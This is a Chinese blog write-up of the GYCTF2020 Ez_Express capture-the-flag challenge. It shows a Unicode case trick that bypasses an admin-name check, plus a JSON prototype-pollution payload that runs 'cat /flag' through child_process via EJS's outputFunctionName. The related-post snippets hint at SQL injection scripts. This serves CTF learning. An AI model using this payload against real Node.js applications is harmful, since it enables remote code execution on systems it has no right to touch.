[GYCTF2020]Ez_Express

最新推荐文章于 2022-05-03 18:52:06 发布
最新推荐文章于 2022-05-03 18:52:06 发布
阅读量143 收藏
点赞数
分类专栏: wp 文章标签: nodejs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshilnp/article/details/120263373
版权

[GYCTF2020]Ez_Express

知识点:

javascript大小写特性

js原型链污染

解题:

打开界面一个登录框,需要以ADMIN登录,www.zip下载源码:

在这里插入图片描述

不允许以 admin ADMIN 注册,但是后面存在

在这里插入图片描述

直接使用 admın 特殊字符注册即可,

在这里插入图片描述

又因为存在 merge 操作,所以存在原型链污染,审计的时候发现在 / 路由时,存在

在这里插入图片描述

一个未定义的属性,然后再最后在 info 路由进行了渲染,寻找原型链

https://evi0s.com/2019/08/30/expresslodashejs-%e4%bb%8e%e5%8e%9f%e5%9e%8b%e9%93%be%e6%b1%a1%e6%9f%93%e5%88%b0rce/

所以我们只需要在 / 进行污染,然后在访问 info 路径即可得到回显

payload:

{"lua":"a","__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"},"Submit":""}

在这里插入图片描述

记得修改 content-Type ,最后访问 info 即可下载一个 flag 文件了

w0s1np
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
2021-3-18_js原型链之_[GYCTF2020]Ez_Express
抒情诗
03-18 399
这题是第一次接触到的js原型链,学得太慢了 新手学习,不免有错漏。 js的原型链污染就是js在调用数组下标或者对象的属性的时候如果没有在自己这里发现相关的就会自动向上查找,emmm因为js中一切皆对象,一个对象的__proto__还是一个对象,对象.__proto__就叫做对象的原型?好像是这样。然后会一直向上查找知道找到Object的原型为null似乎是,然后他向上查找的这条链就叫做JavaScript的原型链。我们这里要用的原型链污染其实就是因为,如果JavaScript代码之中有一个东西没有经过定义并
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 1975
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 499
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
CBC字节反转攻击原理
woshilnp的博客
05-24 1944
CBC字节反转攻击原理 原理: 在CBC模式中,每个明文块先与前一个密文块进行异或后,再进行加密。在这种方法中,每个密文块都依赖于它前面的所有明文块。同时,为了保证每条消息的唯一性,在第一个块中需要使用初始化向量。 CBC加密过程 在这里重要的一点是,CBC工作于一个固定长度的比特组,将其称之为块。在本文中,我们将使用包含16字节的块。 前一块的密文用来产生后一块的密文。 加密过程转化成文字来叙述: 首先将明文分组(常见的以16字节为一组),位数不足的使用特殊字符填充。 生成一个随机的初始化向量(IV
[GKCTF 2021]easynode
woshilnp的博客
09-15 1522
[GKCTF 2021]easynode 知识点: js 弱类型 ejs 原型链污染 解题: 源码: const express = require('express'); const format = require('string-format'); const { select,close } = require('./tools'); const app = new express(); var extend = require("js-extend").extend const ejs = req
[NEEPU Sec 2021 公开赛]WP
woshilnp的博客
05-26 849
[NEEPU Sec 2021 公开赛]WP 前言: 这哪是新生赛呀,web方向题目难度还是特别高的,但是复现之后感觉质量真的挺高的,这里记录下感觉有点意思的题目 随便注2.0 这里过滤了上传用了的字符: return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject); 但还是先注出一些有用的数据先把: 0%27;show%0ddatabases;%23 0%2
iscc2021 easyweb
woshilnp的博客
05-24 718
iscc easyweb 考点:无列名sql盲注 payload: import requests url = "http://39.96.91.106:5001/?id=" result = "" i = 0 while (True): i = i + 1 head = 32 tail = 127 while (head < tail): mid = (head + tail) >> 1 payload = "1'
[XNUCA2019Qualifier]HardJS
woshilnp的博客
09-13 573
[XNUCA2019Qualifier]HardJS 知识点: node.js原型链污染 node.js代码审计 解题: 分析 server.js: 使用的 express 这个框架,模板渲染引擎用的 ejs 。路由如下: / 首页 /static 静态文件 /sandbox 显示用户HTML数据用的沙盒 /login 登陆 /register 注册 /get json接口 获取数据库中保存的数据 /add 用户添加数据的接口 发现调用了 lodash ,而且版本较低,估计存在原型链污染漏洞,发现调用
[网鼎杯 2020 半决赛]BabyJS
woshilnp的博客
09-13 556
[网鼎杯 2020 半决赛]BabyJS 知识点: SSRF绕过 node.js代码审计 解题: 关键代码如下: var express = require('express'); var config = require('../config'); var url=require('url'); var child_process=require('child_process'); var fs=require('fs'); var request=require('request'); var rout
ez_udp_connect
最新发布
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值